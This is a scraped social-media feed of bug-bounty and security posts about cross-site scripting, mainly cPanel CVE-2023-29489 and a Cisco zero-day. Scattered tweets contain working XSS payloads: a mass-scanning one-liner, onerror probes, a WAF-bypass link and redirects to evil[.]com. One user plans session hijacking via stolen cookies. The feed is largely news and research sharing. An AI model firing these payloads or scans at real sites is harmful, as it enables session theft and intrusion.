![profile](https://pbs.twimg.com/profile_images/1418087718408523776/wY-1xb3-_normal.jpg)
Cybertix
@thecybertix a year ago 𝘽𝙪𝙜 𝙏𝙮𝙥𝙚 : Reflected XSS 𝙋𝙡𝙚𝙖𝙨𝙚 𝙨𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏 𝘾𝙤𝙪𝙧𝙨𝙚 𝙇𝙞𝙣𝙠: https://t.co/xXKr0Ma4jZ #bugbountytips #YouTube #Course #youtubechannel #SubscribeNow #PenetrationTesting #BugBounty #OWASP #securitybreach #bugs
![profile](https://pbs.twimg.com/profile_images/419147954344058880/bTW9Gx7T_normal.png)
Gray Hats
@the_yellow_fall a year ago XSS Exploitation Tool: the exploitation of Cross-Site Scripting vulnerabilities https://t.co/VjUSrw4QX0 #opensource #infosec #security #pentesting
![profile](https://pbs.twimg.com/profile_images/537666031192272896/SLVtYItD_normal.png)
XSS Payloads
@XssPayloads a year ago Finding XSS in a million websites, good finding by @infosec_au https://t.co/uVQR9hgRn2
![profile](https://pbs.twimg.com/profile_images/1579447960336736258/onpvDoib_normal.jpg)
Bug Hunty
@bughunty a year ago Easy Automation XSS Tip
cat subdomains.txt | waybackurls >> wayback.txt
cat subdomains.txt | hakrawler -depth 3 -plain >> spider.txt
cat spider.txt wayback.txt | kxss
#bugbounty #bugbountytips #cybersecurity #pentesting #hacking
![profile](https://pbs.twimg.com/profile_images/1391035223442341894/im3A3o_l_normal.jpg)
Kenan Genc
@kenanngnc a year ago #bugbountytips #bugbountytip #bugbounty #xss
![profile](https://pbs.twimg.com/profile_images/1612128553457561600/A2FAEqfw_normal.jpg)
Deepak 🇮🇳 -- bug_vs_me
@bug_vs_me a year ago #bugbountytip #BugBounty #0day #xss
![profile](https://pbs.twimg.com/profile_images/1587567677496778752/LyFUN27h_normal.jpg)
Keroles Magdy
@Keroles__Magdy a year ago 💖💖 Praise be to God, Thanks God 💖💖 It found a Critical Bug that leaked names, addresses, and employee data 😜😜😎😎💖💖 #bugbounty #bughunting #bugcrowd #security #vulnerabilities #xss https://t.co/R51SgP4mri
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroup a year ago 🔥Bug:- Stored XSS tip :- always check all the fields and insert your payload #hacking #alwayslearning #hackers #bugbounty #bugbountytips #staysecure #happy credit:- Raviraj Jagtap https://t.co/txj9bdeclu
![profile](https://pbs.twimg.com/profile_images/1632438794031968256/zlVup5hD_normal.jpg)
VulnVision
@VulnVision a year ago we are happy to share a 0day we have found on wordpress login page allow un-auth cross site scripting (xss) #bugbountytip #BugBounty #ItTakesACrowd https://t.co/AznA0pG3IB
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris a year ago XSS in custom, user-supplied CSS - Visit https://t.co/WO0nrikfT0 for the solution. #web_application #xss #css #infosec #coder
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks a year ago (CVE-2023-2343): Cross-site Scripting (XSS) - DOM in pimcore/pimcore. https://t.co/JI3YeQ24dN Disclosed by https://t.co/hT0t5Xj4rs, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks a year ago (CVE-2023-2342): Cross-site Scripting (XSS) - Reflected in pimcore/pimcore. https://t.co/QUjGit6PON Disclosed by https://t.co/hT0t5Xj4rs, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks a year ago (CVE-2023-2341): Cross-site Scripting (XSS) - Generic in pimcore/pimcore. https://t.co/3AQiMPbwyG Disclosed by https://t.co/UfN0Roo7qs, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks a year ago (CVE-2023-2340): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/QY2fuNfvD1 Disclosed by https://t.co/6dCOfMLYmV, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks a year ago (CVE-2023-2339): Cross-site Scripting (XSS) - Reflected in pimcore/pimcore. https://t.co/0K5Jc80IdG Disclosed by https://t.co/6dCOfMLYmV, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks a year ago (CVE-2023-2328): Cross-site Scripting (XSS) - Generic in pimcore/pimcore. https://t.co/DH2V54zyEz Disclosed by https://t.co/hT0t5Xj4rs, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks a year ago (CVE-2023-2327): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/bclvtmEHor Disclosed by https://t.co/hT0t5Xj4rs, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks a year ago (CVE-2023-2323): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/JWjy6Mq1YK Disclosed by @sampritdas8, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks a year ago (CVE-2023-2322): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/oxKGO12RpK Disclosed by https://t.co/hUcH5mI7Mx, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1206541065815244805/hsk5DK2r_normal.jpg)
Vasileiadis A. (Cyberkid)
@Anastasis_King a year ago Finding XSS in a million websites (cPanel CVE-2023-29489) https://t.co/7c1UDJTAFX #Pentesting #CVE #CyberSecurity #Infosec https://t.co/owxslV8pke
![profile](https://pbs.twimg.com/profile_images/1649034614042681345/i8oFRGCE_normal.jpg)
HackersNews.co.uk
@HackersNews247 a year ago Find Us @HackersNews247 For The Latest News Or Visit Our Website Hackers News! #Hacking #Hacked #HackersNews #hacker #Hackingtime #Anonymous #hacktheplanet #news #newsUpdate #NewsUpdates https://t.co/OVJYObouiO
![profile](https://pbs.twimg.com/profile_images/1649034614042681345/i8oFRGCE_normal.jpg)
HackersNews.co.uk
@HackersNews247 a year ago Let Remote Attackers Launch XSS. Hackers News https://t.co/64NSNiO8Vs #Hacking #Hacked #hack #Anonymous #NewsUpdate #HackersNews
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_ a year ago Our favourite community contributions to the XSS cheat sheet #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
ahmedzezo
@ahmedze52774770 a year ago Good XSS day 🤤😍 #bugbountytips #hackerone #BugBounty https://t.co/kUCLyO3z5h
![profile](https://pbs.twimg.com/profile_images/3703513695/4ae724ea6ed248d871bc9d523ae1c24e_normal.png)
Pierluigi Paganini - Security Affairs
@securityaffairs a year ago #Cisco discloses a bug in the Prime Collaboration Deployment solution https://t.co/R4lheXfwFR #securityaffairs #hacking
![profile](https://pbs.twimg.com/profile_images/1653323500449419267/WYVbhtSu_normal.jpg)
Eve🧚♀️
@ex16x41 a year ago My first bugbounty submission after a few years of not participating, nice start of the night )) 🐞🔎 Reflected XSS to Open Redirect: http://sub.sub.domain[.]com/publicsearch?source=%3Cscript%3Ealert(document.domain)%3C/script%3E for redir: document.location=“https://evil[.]com https://t.co/6zxHM4ZlBA
![profile](https://pbs.twimg.com/profile_images/1473710712669315075/HXTm1Avu_normal.jpg)
Codelivly
@Codelivly a year ago Cisco Zero-Day Flaw: Let Remote Attackers Launch XSS Attacks Read Here : https://t.co/UE6A5hS84A #cisco #infosec #cybersec https://t.co/5TI61kvjGI
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_ a year ago How I was Able To Find Reflected XSS ? by: ozomarzu https://t.co/GlaL5cBQD1 #bugbounty #WriteUps
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris a year ago Ensure input escaping in JSP - Visit https://t.co/cEXXft7io3 for the solution. #xss #java #infosec #engineering #code
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris a year ago Is it possible to grab all the cookies of different websites by only one XSS attack? - Visit https://t.co/XZyfUrPNgr for the answer. #xss #cookies #infosec #code #softwareengineering
![profile](https://pbs.twimg.com/profile_images/1196472306949918721/Zbk8ZOaj_normal.jpg)
ႢႭႹႠ ႭႵႰႠႻႤ გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze a year ago @BurpBounty @infosec_au I agree with @BurpBounty . If your crawler found entry point with vulnerable cpanel after running scan it will find this xss 100%.
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
Nehemiah Edet
@clexingtony a year ago Finding XSS in a million websites (cPanel CVE-2023-29489) https://t.co/qw8io00u0M #Pentesting #CVE #CyberSecurity #Infosec https://t.co/1OSfYN5PK5
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroup a year ago Anatomy of an XSS Attack #infosec #cybersecurity #cyberdefense #hacking #informationsecurity #hacking #bugbounty #bugbountytips https://t.co/PeUXFsTH0D
![profile](https://pbs.twimg.com/profile_images/1651827535876079616/_-I8Dv0w_normal.jpg)
def1ant
@0xdef1ant a year ago Nuclei's headless capability is very powerful :) @pdiscoveryio #BugBounty #hackerone #bugcrowd #xss https://t.co/5Vfh9QNiw8
![profile](https://pbs.twimg.com/profile_images/1394297518335406083/M6nJf4pH_normal.jpg)
Burp Bounty
@BurpBounty a year ago Hi everyone!! We have not released any special profiles to detect the CVE-2023-29489, because our scanner can potentially detect the XSS in the affected endpoint found by @infosec_au in their research https://t.co/evZyEOq7OU
![profile](https://pbs.twimg.com/profile_images/1616753532950175745/_en9P83L_normal.jpg)
Kullai🇮🇳
@Kullai12 a year ago P3-Reflected XSS to Open Redirection in @Bugcrowd . Payload : http://sub[.]domain[.]com/scripts/wa-AWD.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E For Open Redirection document[.]location=“https://evil[.]com” #bugbounty #bugcrowd #bounty https://t.co/oGzbdLYVVP
![profile](https://pbs.twimg.com/profile_images/1626268981274505218/1kaj8Ypc_normal.jpg)
Cyber Wiki
@theCyberWiki a year ago Create Temporary Emails and Phone Numbers - https://t.co/anXUg6D26T #CyberWiki #theCyberWiki #HackHunt #Hack #Hacker #Hacking #EthicalHacking #Network #EthicalHacker #Cybersecure #Cybersecurity #Vulnerable #Software #Pentesting #XSS #VAPT #Audit #Forensics #Coding #BugHunting https://t.co/xh2gR5cPUT
![profile](https://pbs.twimg.com/profile_images/1634754471040548866/q8luDRF6_normal.jpg)
7h3h4ckv157
@7h3h4ckv157 a year ago Finding XSS in a million websites (cPanel CVE-2023-29489) https://t.co/52rhy2ncAG #infosecurity #CyberSec #bug #coding #BugBounty #infosec #bugbountytip #bugbountytips #pwn #ctf #CyberSecurityAwareness #cybersecuritytips #Hacking #XSS #redteam #Pentesting #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1646178438003458048/ONYGtDX3_normal.jpg)
Infosec Alevski 💻🕵️♂️
@Alevskey a year ago Cisco discloses a bug in the Prime Collaboration Deployment solution: https://t.co/cMeSav8tbi by Security Affairs #infosec #cybersecurity #technology #news
![profile](https://pbs.twimg.com/profile_images/3703513695/4ae724ea6ed248d871bc9d523ae1c24e_normal.png)
Pierluigi Paganini - Security Affairs
@securityaffairs a year ago #Cisco discloses a bug in the Prime Collaboration Deployment solution https://t.co/R4lheXfwFR #securityaffairs #hacking #malware
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroup a year ago Cross Site Scripting (XSS) #infosec #infosecurity #cybersec #cybersecurity #ethicalhacking #penetrationtesting #pentesting #kalilinux #hacking #hacker #bugbounty #bugbountytips https://t.co/lnQ9Lmmfdw
![profile](https://pbs.twimg.com/profile_images/1371589267252776962/8_4YSfPn_normal.jpg)
Alonso Caballero
@Alonso_ReYDeS a year ago The video of the free webinar "Cross-Site Scripting (XSS)" is now available. #cybersecurity #hacking #readteam #bugbounty #forensics #osint 🤖 https://t.co/QU6ghIwHeR https://t.co/y5eiyp3agf
![profile](https://pbs.twimg.com/profile_images/1152241080869511171/Nxzz-tZx_normal.png)
Grid32 Cybersecurity
@Grid32InfoSec a year ago Cisco discloses XSS zero-day flaw in server management tool https://t.co/EuCwvtASuG #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/659444735791210500/XGvv9R-0_normal.jpg)
Ptrace Security GmbH
@ptracesecurity a year ago Finding XSS in a million websites (cPanel CVE-2023-29489) https://t.co/pFdUjmv9B4 #Pentesting #CVE #CyberSecurity #Infosec https://t.co/BYkcMvNS4g
![profile](https://pbs.twimg.com/profile_images/1426303620266565633/Xxj8V-a9_normal.jpg)
HolyBugx
@HolyBugx a year ago @BurpBounty "... because our scanner can potentially detect the XSS in the affected endpoint found by @infosec_au" - that's how you should've phrased it.
![profile](https://pbs.twimg.com/profile_images/1598179360900780034/Gywep4k9_normal.jpg)
Het Mehta
@hetmehtaa a year ago 💠 𝗕𝗹𝘂𝗲 𝗧𝗲𝗮𝗺𝗶𝗻𝗴 Bootcamp Series 🔗 Part 1: https://t.co/QUDxkEbrTk 🔗 Part 2: https://t.co/RX4l8R8xb8 🔗 Part 3: https://t.co/pwOthztAlU @hacklido #infosec #blueteam #cyber #tech #blogs
![profile](https://pbs.twimg.com/profile_images/1394297518335406083/M6nJf4pH_normal.jpg)
Burp Bounty
@BurpBounty a year ago @infosec_au Hey @infosec_au , my apologies, Burp Bounty Pro XSS profiles detect your issue only if scan the correct path /cpanelwebcall/. Of course, I didn't know about this issue until you posted it. I want to congratulate you on your work, https://t.co/evZyEOq7OU
![profile](https://pbs.twimg.com/profile_images/1394297518335406083/M6nJf4pH_normal.jpg)
Burp Bounty
@BurpBounty a year ago @malcolmx0x @infosec_au I agree with you, without @infosec_au research and their post none of us would know about the XSS in Cpanel.
![profile](https://pbs.twimg.com/profile_images/1637836898453340160/BBX77k4x_normal.jpg)
SECBROS
@YouTube_Secbros a year ago Anatomy of an XSS Attack #infosec #cybersecurity #cybersecuritytips #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty #bugbountytips https://t.co/DBiku2eZIl
![profile](https://pbs.twimg.com/profile_images/1394297518335406083/M6nJf4pH_normal.jpg)
Burp Bounty
@BurpBounty a year ago @AkashHamal0x01 @rez0__ @infosec_au Exactly, I didn't know that this specific software had an xss, but because of how the scanner works, if it scans that path, it would identify the xss. It's not my intention to detract from the author or say that I knew about this vulnerability before he did.
![profile](https://pbs.twimg.com/profile_images/1183460322843082752/EbKlKldd_normal.jpg)
Towards Cybersecurity
@TowardsCybersec a year ago Cisco disclosed a zero-day vulnerability in the company's Prime Collaboration Deployment (PCD) software that can be exploited for cross-site scripting attacks. #cybersecurity #security #infosec #Cisco #Zeroday #bug #infosecurity #Vulnerability #cyberattack #xss #hacking #hack https://t.co/mpBIRDcFRu
![profile](https://pbs.twimg.com/profile_images/1443293358718287872/bLYwaPeV_normal.jpg)
root@AkashHamal0x01:~/ # 🇵🇭
@AkashHamal0x01 a year ago @rez0__ @BurpBounty @infosec_au he meant that his scanners also detected xss on /web../ path not that he already knew the issue or identified it
![profile](https://pbs.twimg.com/profile_images/1404125874350264322/6G0a9c7a_normal.jpg)
payloadartist
@payloadartist a year ago 🪲 Finding XSS In A Million Websites (cPanel CVE-2023-29489) https://t.co/ezIOtmfDUY Awesome research by @infosec_au and @assetnote team #bugbountytips #bugbounty #infosec #cybersecurity https://t.co/Qng7R0Qzj4
![profile](https://pbs.twimg.com/profile_images/1394297518335406083/M6nJf4pH_normal.jpg)
Burp Bounty
@BurpBounty a year ago Maybe there was a misunderstanding with my previous tweet, I didn't know there was an XSS bug in cpanel, I read it in the @infosec_au article. Once I read I saw that with the XSS payloads this issue was detected if the path /cpanelwebcall/ was scanned. All credit to @infosec_au
![profile](https://pbs.twimg.com/profile_images/1640291793517309952/Zmgqd9M__normal.jpg)
Matin Nooriyan
@MatinNouryan a year ago nuclei template for cpanel xss url: http/cves/2023/CVE-2023-29489.yaml #bugbountytips #cve_2023 #cpanel #xss #hackerone #bugbrowd https://t.co/tqYJtSZF7h
![profile](https://pbs.twimg.com/profile_images/1553373164763242496/woyvOnxt_normal.jpg)
dadomar
@v0000000000l a year ago @infosec_au I hope you understand the purpose of that tool, it's like running Burp Intruder on /cpanelwebcall/$[payload here]$ with a list of xss payloads , it can be whatever endpoint, not `cpanelwebcall` and these types of automations are in nuclei a lot... :|
![profile](https://pbs.twimg.com/profile_images/1534604643686309889/2Q5xoqaw_normal.png)
Gbounty
@GBountySecurity a year ago 🔥🚀 "Heads up, everyone! ! We have not released any special profiles to detect the CVE-2023-29489 (#XSS in #cPanel) vulnerability, because we already detected it with our current XSS profiles 💯.🔒🌐 #Cybersecurity #InfoSec" 🚀🔥 https://t.co/D8Q5hj094Z https://t.co/hYNwESPnet https://t.co/Qv8VzSL9vX
![profile](https://pbs.twimg.com/profile_images/1645746233410027520/GIPqoFtu_normal.jpg)
nazu:)🩸🌳💚
@mrnazu_ a year ago 🔥 #cPanel #CVE-2023-29489 🔥 Over 1 million websites were exposed to a reflected #XSS vulnerability recently discovered in #cpanel, a widely used web hosting software! #Web #BugBounty #CyberSecurity https://t.co/JrdzBiponD
![profile](https://pbs.twimg.com/profile_images/1651861455912808448/1kbR3Dp6_normal.jpg)
404xNotFound
@htp_online a year ago Reflected XSS #Hacking https://t.co/CbaWAIhgOL
![profile](https://pbs.twimg.com/profile_images/1651861455912808448/1kbR3Dp6_normal.jpg)
404xNotFound
@htp_online a year ago Testing site for XSS.. Then sleep. Night all. #GoodNightTwitterWorld #Hacking
![profile](https://pbs.twimg.com/profile_images/1418087718408523776/wY-1xb3-_normal.jpg)
Cybertix
@thecybertix a year ago cPanel CVE-2023-29489 XSS One-Liner subfinder -d https://t.co/Yhf9Pkx6cS -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path '/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaaaaa' -mc 400 #bugbountytips #cybersecuritytips #bug #hacks https://t.co/95OiBf33rM
![profile](https://pbs.twimg.com/profile_images/1651861455912808448/1kbR3Dp6_normal.jpg)
404xNotFound
@htp_online a year ago Today's accomplishments: Completed Path Traversal for "fun" Completed a path on TryHackMe Programmed a clickjacking POC Learned to use Burp properly, practiced manipulating headers. Finished learning OWASP ZAP for manual testing. Coded my XSS Session Hijack exploit #Hacking
![profile](https://pbs.twimg.com/profile_images/1651326735458156544/LLEK8X7v_normal.jpg)
dexsec
@DexSec0x a year ago Try to get some bounty! CVE: CVE-2023-29489 Vulnerability : 0 Day cPanel XSS Payload: cpanelwebcall/<img%20src=x%20onerror="prompt(1515)">aaaaaaaa #0day #xss #vulnerability #cpanel #BugBounty https://t.co/2BFEHb7IyO
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris a year ago Why doesn't this XSS attack work? - Visit https://t.co/ukZU77nQMz for the answer. #xss #dom #infosec #softwareengineering #software
![profile](https://pbs.twimg.com/profile_images/1620375171885301760/br4IgPWj_normal.jpg)
0xJay
@0SPwn a year ago "><a href=jav&#x0D;ascript&colon;top[8680439..toString(30)](document.domain)>Click</a> - LiteSpeed (ModSecurity) WAF Bypass. #waf #bugbountytips #BugBounty #hacking #xss
![profile](https://pbs.twimg.com/profile_images/1651861455912808448/1kbR3Dp6_normal.jpg)
404xNotFound
@htp_online a year ago Working on a way to exploit XSS & Hijack a session for future testing. I would technically just add my IP address there and create a listener, then if the XSS on the test site executes and steals a cookie I can jack their sesh in theory.. #Cybersecurity #BugHunting #Infosec https://t.co/3k0C39YHCC
![profile](https://pbs.twimg.com/profile_images/1554022844899532800/eTA6AA2I_normal.jpg)
Kunj Patel
@Legacy_Defender a year ago #bugbounty #bugbountytips #xss #securitybreach Credit: Cyber Security Researcher and Bug Hunter. Kunj Patel aka (Legacy_Defender) https://t.co/fWuwaTRhzi……… https://t.co/YSbrd6iLQY https://t.co/JnTzxYNwmv
![profile](https://pbs.twimg.com/profile_images/1423328835630600197/Yq6hnEe5_normal.jpg)
Kinnaird McQuade 💻☁️💥
@kmcquade3 a year ago It’s not every day you get to meet your heroes in #infosec I got to meet @jeremiahg at @RSAConference! He’s one of the OGs in AppSec and the founder at White Hat. Back in college, I read his book on XSS and all his blogs. And we finally got to meet! See you back in Maui 🤙🏼 https://t.co/rahu3leND8
![profile](https://pbs.twimg.com/profile_images/1634754471040548866/q8luDRF6_normal.jpg)
7h3h4ckv157
@7h3h4ckv157 a year ago Mastering Payloads for Web Application Security: XSS, LFI, RCE, and SQL Injection 📍 https://t.co/xK86nN5a0e #infosecurity #CyberSec #bug #coding #BugBounty #infosec #bugbountytip #bugbountytips #pwn #ctf #CyberSecurityAwareness #cybersecuritytips #Hacking #redteam #Pentesting… https://t.co/JiLsgFSeZZ
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_ a year ago Cisco pinpoints an XSS vulnerability affecting Prime Collaboration #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1358854458470326272/1_z5EYW7_normal.jpg)
pwnmachine
@princechaddha a year ago [CVE-2023-20864] cPanel - Cross-Site Scripting Nuclei Template: https://t.co/RpJcSKt28A Reference: https://t.co/gwy9udIiZn #CVE #cpanel #NucleiTemplates #bugbounty @pdnuclei https://t.co/SrRCFLhgay
![profile](https://pbs.twimg.com/profile_images/1272177873864933376/s3p8z6rf_normal.jpg)
Siva krishna
@le4rner a year ago @infosec_au @assetnote I am surprised by the POC it is and a basic XSS probe could have picked this up as reflection, but never found it, I agree now that cpanel might be vulnerable to many more bugs https://t.co/V0QAJxQGL4<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_ a year ago Cisco Zero-Day Flaw: Let Remote Attackers Launch XSS Attacks #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1529808778111107076/lB4saX7z_normal.jpg)
Bar Hofesh @[email protected]
@bararchy a year ago Nice #bugbountytips which you can also see on https://t.co/BcNXq5gEF2 (@brokencrystalss) You can get an XSS even if the response is XML by using the relevant payload: <x:script xmlns:x="https://t.co/TglNoErgHR">alert(1)</x:script> Go try it out: https://t.co/WTAsukAAy8
![profile](https://pbs.twimg.com/profile_images/1633202137650847744/PKyaSLHx_normal.jpg)
ReconOne
@ReconOne_bk a year ago [Oh noo] Reflected XSS in cPanel - tracked as CVE-2023-29489 🔥 If you have cPanel servers in your asset list, check them out 👇 #recon #AttackSurface #bugbounty #recontools #recontips #xss #cPanel https://t.co/dJnTqn8zZ3
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris a year ago XSS: Parsing Javascript - Visit https://t.co/Ph2mGJcnI4 for the solution. #javascript #xss #infosec #softwareengineering #100daysofcode
![profile](https://pbs.twimg.com/profile_images/1405882362072768519/6ADt8ReD_normal.jpg)
Simba Tech Tv
@simrotion13 a year ago CPanel Reflected XSS payload for #CVE-2023-29489 POC https://t.co/QovlMufd9Y #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/1607956749226774529/kH3-SwwC_normal.jpg)
zaen.hxr
@zaenhaxor a year ago Xss #hacking https://t.co/hhRADmIHOK
![profile](https://pbs.twimg.com/profile_images/1384538705797554177/o0BURm0O_normal.png)
Black Hat Ethical Hacking
@secur1ty1samyth a year ago Cisco Discloses Zero-Day #XSS Vulnerability in Prime Collaboration Deployment Software #Cisco Zero-Day #Vulnerability in Prime Collaboration Deployment Software Discovered, Could Lead to XSS Attacks Post: https://t.co/elBPtQsmBf #zeroday #exploit #hacking #infosec https://t.co/RyA1svSmrO
![profile](https://pbs.twimg.com/profile_images/1274957081112711168/N_tfeC57_normal.jpg)
Simon Zerafa 🖖 (@[email protected])
@SimonZerafa a year ago @SGgrc Oh cool cPanel; not like that's everywhere 🫤🤦♂️ https://t.co/IAN96d4mD3 https://t.co/OCbK8D6Gi4
![profile](https://pbs.twimg.com/profile_images/419147954344058880/bTW9Gx7T_normal.png)
Gray Hats
@the_yellow_fall a year ago CVE-2023-29489: XSS Vulnerability in cPanel Threatening 1.4 Million Websites https://t.co/FU6E1GzeCs #opensource #infosec #security #pentesting
![profile](https://pbs.twimg.com/profile_images/1448503614188761091/Bo7HBtiG_normal.jpg)
SAFE 😵💫
@0x21SAFEa year agoCPanel 0day Reflected XSS payload for CVE-2023-29489 htt.p://example.com/cpanelwebcall/%3Cimg%20src%3Dx%20onerror%3D%22prompt%281%29%22%3Eaaaaaaaaaaaa #0day #xss #bugbountytips
![profile](https://pbs.twimg.com/profile_images/3358949069/c09a65ba5749ebf32639f5862db4b273_normal.jpeg)
Allaboutclait
@allaboutclaita year agoCisco discloses XSS zero-day flaw in server management tool https://t.co/NcNR6oUiLt #infosec #Cisco
![profile](https://pbs.twimg.com/profile_images/1418144429320384514/zcb_u3tV_normal.jpg)
Xc0re Security
@Xc0resecuritya year agoCisco discloses XSS zero-day flaw in server management tool https://t.co/Uv1sO2Vzcb #cybersecuritynews #netsec #infosec https://t.co/IdEjlmKuT5
![profile](https://pbs.twimg.com/profile_images/1078619152636624897/MxZXcy8p_normal.jpg)
Cyber Secure New York
@cybersecurenya year agoBleepinComputer: Cisco discloses XSS zero-day flaw in server management tool - @serghei https://t.co/DONHT2cLKp https://t.co/19pHCTsz2Q #cybersecurity #hacking #computersecurity #nyc #newyork
![profile](https://pbs.twimg.com/profile_images/1432505620540706820/lv6DtM7I_normal.png)
TheWhiteCircle
@twc1rclea year agohttps://t.co/jFvl4TS5FR #infosec #tools #vapt #hacking #cyberattack #informationsecurity #cybersecurity #cve #opensource #vulnerability #exploit #ethicalhacking #twc #programming #thewhitecircle
![profile](https://pbs.twimg.com/profile_images/1579211588359229442/UKkCk6FI_normal.jpg)
Cyberfeed.io
@cyberfeedioa year agoCisco discloses XSS zero-day flaw in server management tool https://t.co/9qfN2oFnQN #cybersec #security #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1516186231083876352/ahW_7jzj_normal.jpg)
Thee Eclipse
@Thee_Eclipsea year agoYay, I was awarded a $$$ bounty on @Hacker0x01! 🎩 Issue: Stored XSS via SVG https://t.co/YkRMxxn9K9 #TogetherWeHitHarder #bugbounty #hacking
![profile](https://pbs.twimg.com/profile_images/1557290969766457344/xoSk7tPH_normal.jpg)
Pentester Academy
@SecurityTubea year agoEver wanted to know how XSS attacks work? Try it hands-on, for free! In this lab exercise, you will pentest a vulnerable web application with the XSSer tool. Sign in at https://t.co/vfBZUZ9khb and get started at https://t.co/9eVbY19yLq #XSS #pentest #infosec https://t.co/t3IjCJbKqC
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoDo WebGoat style XSS attacks still work? - Visit https://t.co/pId6Qv2TS7 for the answer. #web_application #webgoat #infosec #code #software
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoCommodity Injection Signatures, Malicious Inputs, XSS, HTTP Header Injection, XXE, RCE, Javascript, XSLT - https://t.co/Be95yi7ftb #bugbountytips #cybersec #infosec
![profile](https://pbs.twimg.com/profile_images/1640678630945878017/H5Zaf_vB_normal.jpg)
X3NUX
@hidayatcodea year agoAwesomeXSS This repository is a collection of Awesome XSS resources. Contributions are welcome and should be submitted via an issue. https://t.co/IA0E9zpdcx #infosec #pentesting #bugbounty
![profile](https://pbs.twimg.com/profile_images/1628814157297467394/zbs7FY-5_normal.jpg)
Skidrow/ياسر
